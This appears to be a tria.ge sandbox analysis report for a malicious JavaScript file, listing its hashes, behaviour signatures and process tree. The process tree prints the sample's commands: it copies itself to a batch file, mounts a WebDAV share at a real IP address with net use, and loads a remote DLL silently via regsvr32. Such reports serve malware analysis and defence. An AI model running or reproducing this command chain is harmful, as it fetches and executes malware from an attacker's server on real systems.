Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
122s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
-
submitted
11/07/2024, 09:26
General
-
Target
155945859957932489.js
-
Size
5KB
-
MD5
02db4fd1a39cf089e9ed8e1c21a6d26e
-
SHA1
49812f6cbd0694b3a57d21e8c92c8370fcf1ac9e
-
SHA256
522ea0b16261055d505d2e62239a33954b13a5e703ef7fe6d3768e0eb091b0ec
-
SHA512
9d043d0eae5bd9cf5fdd717a6bdb71096a420deb30a2d698c4a3a284e7f2bd9b88fd30226978fd667062ffb324fb90ff7d311e2c841be938640d8ea1380f8bad
-
SSDEEP
96:E5SNRNRZ/viEAwNNq700XA4Nq7008xJBdUjObreVKLVE1T0rQjMDu80+7VGnDuse:QeR1qEpNN600XLN600QGAg76VHdFka
Malware Config
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
-
Suspicious use of WriteProcessMemory 11 IoCs
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\155945859957932489.js1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\155945859957932489.js" "C:\Users\Admin\\xnsbwi.bat" && "C:\Users\Admin\\xnsbwi.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\554.dll3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD502db4fd1a39cf089e9ed8e1c21a6d26e
SHA149812f6cbd0694b3a57d21e8c92c8370fcf1ac9e
SHA256522ea0b16261055d505d2e62239a33954b13a5e703ef7fe6d3768e0eb091b0ec
SHA5129d043d0eae5bd9cf5fdd717a6bdb71096a420deb30a2d698c4a3a284e7f2bd9b88fd30226978fd667062ffb324fb90ff7d311e2c841be938640d8ea1380f8bad